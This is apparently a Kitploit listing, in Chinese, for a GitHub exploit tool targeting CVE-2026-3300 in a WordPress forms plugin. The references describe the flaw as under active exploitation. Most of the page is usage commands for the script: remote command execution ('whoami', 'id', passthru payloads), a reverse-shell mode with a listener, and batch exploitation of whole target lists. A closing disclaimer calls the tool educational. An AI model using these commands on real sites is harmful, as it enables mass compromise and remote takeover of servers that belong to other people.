Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-3300 — CVE-2026-3300 | Kitploit
工具/GitHubGitHub/horkimhab/cve-2026-3300
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubhorkimhab/cve-2026-3300

CVE-2026-3300

CVE-2026-3300

查看仓库
13个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

CVE-2026-3300 - Wordpress

⚡ 简单用法

仅在安全且授权的环境中使用此项目,例如:

  • 本地虚拟机
  • Docker 容器
  • 隔离实验室环境
  • 授权的渗透测试环境

示例设置:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate


示例用法:

root@kitploit:~
# Normal command execution
python cve-2026-3300.py http://localhost --mode poc -c "whoami"

# Try different payload types
python cve-2026-3300.py http://localhost --mode poc -p passthru -c "id"

# Reverse Shell (Recommended)
python cve-2026-3300.py http://localhost --mode reverse --listen 4444

# Scan all targets
python cve-2026-3300.py --file targets.txt --mode scan

# Exploit all targets
python cve-2026-3300.py --file targets.txt --mode exploit -c "whoami"

# Reverse shell (single target)
python cve-2026-3300.py --file targets.txt --mode reverse -l 4444

# Test with common field names
python cve-2026-3300.py http://target.com --mode exploit --field text_1 -c "whoami"
python cve-2026-3300.py http://target.com --mode exploit --field email -c "id"

# Reverse shell
python cve-2026-3300.py http://target.com --mode reverse --field text_field -l 4444

致谢或参考

  • https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
  • https://thehackernews.com/2026/06/hackers-exploit-critical-everest-forms.html
  • https://sansec.io/research/stripe-api-skimmer-infrastructure

📚 教育性安全研究仓库

一个在受控环境中学习、测试和研究网络安全概念的仓库。


⚠️ 安全与法律声明

目的

此仓库仅用于教育和授权的安全研究。

它旨在帮助用户了解:

  • 安全漏洞
  • 沙盒与隔离概念
  • 安全编码与防御实践

仅限授权使用

仅在您拥有权限的环境中使用此仓库,例如:

  • 个人实验室或虚拟机
  • Docker 或隔离环境
  • 授权的渗透测试
  • 网络安全培训或学术研究

严禁未经授权或非法使用。


无责任

作者和贡献者不对由本项目引起的任何损害、滥用、法律问题或损失负责。

使用此仓库即表示您同意:

  • 您对自己的行为负责
  • 您将合法且合乎道德地使用它
  • 本项目提供时不附带任何担保

道德使用

本项目旨在用于:

  • 防御性安全研究
  • 网络安全教育
  • 漏洞意识
  • 安全系统与软件研究

请遵循负责任的披露实践并遵守所有适用法律。


联系方式

如需负责任披露或合作,请通过GitHub联系仓库维护者。

下载工具